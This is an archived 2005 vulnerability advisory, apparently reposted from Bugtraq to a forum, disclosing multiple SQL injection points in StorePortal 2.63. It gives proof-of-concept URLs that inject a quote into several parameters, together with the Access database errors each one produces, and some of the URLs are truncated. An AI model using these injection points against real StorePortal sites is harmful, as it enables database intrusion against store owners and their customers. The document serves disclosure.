Multiple Sql Injections In Storeportal 2.63

Full Version: Multiple Sql Injections In Storeportal 2.63

GovernmentSecurity.org > General GSO > Exploit & Vulnerability Mailing List Archives

qcred11

Apr 25 2005, 03:31 PM

QUOTE

Severity: High
Title: Multiple SQL Injections in StorePortal 2.63
Date: 24/04/2005
Vendor: StorePortal
Vendor Website: http://www.storeportal.com/

Proof of Concept Exploits:

These sql injections are caused by the referrer, of these pages called, and are only exploitable if u visit them after visiting
default.asp

http://localhost/default.asp?language='sqlinjection
SQL INJECTION

ERROR MESSAGE !

Store Portal Errors Occured!

Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression

''/default.asp?language='sqlinjection&','')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers

http://localhost/default.asp?id=1&opr=2&am...;sql_injection_
SQL INJECTION

ERROR MESSAGE !

Store Portal Errors Occured!

Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression

''/default.asp?id=1&opr=2&pic='sql_injection_&','')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers

http://localhost/default.asp?opr=35&id=1&i..._&idcategoryp=1
SQL INJECTION

ERROR MESSAGE !

Store Portal Errors Occured!

Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression

''/default.asp?opr=35&id=1&idcategory='sql_injection_&idcategoryp=1&','')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers

http://localhost/default.asp?opr=35&id=1&i...;sql_injection_
SQL INJECTION

Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression

''/default.asp?opr=35&id=1&idcategory=1&idcategoryp='sql_injection_&','')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers

http://localhost/default.asp?mnu=&id=1&opr...;sql_injection_
SQL INJECTION

Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression

''/default.asp?mnu=&id=1&content='sql_injection_&opr=5&','')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers

http://localhost/default.asp?id=1&opr=4&ke...;sql_injection_
SQL INJECTION

Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'IdCategoriaInfo = 1 and
Visible =

'true' and '20050424' >= DataPubblicazione and (DataExpire <= ' 20050424' or DataExpire is null or DataExpire = '') and (Name like

'%'sql_injection_%' or Body like '%'sql_injection_%')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers

http://localhost/default.asp?opr=41&idcate...;sql_injection_
SQL INJECTION

ERROR MESSAGE !

Store Portal Errors Occured!

Error Number= #-2147217900
Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression

''/default.asp?opr=41&idcategory=11&idcategoryp=11&id=1&idproduct='sql_injection_&','')'.
Help Context= 0
Error Source= Microsoft OLE DB Provider for ODBC Drivers

Author:
These vulnerabilties have been found and released by Diabolic Crab

Source: http://seclists.org/lists/bugtraq/2005/Apr/0397.html

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.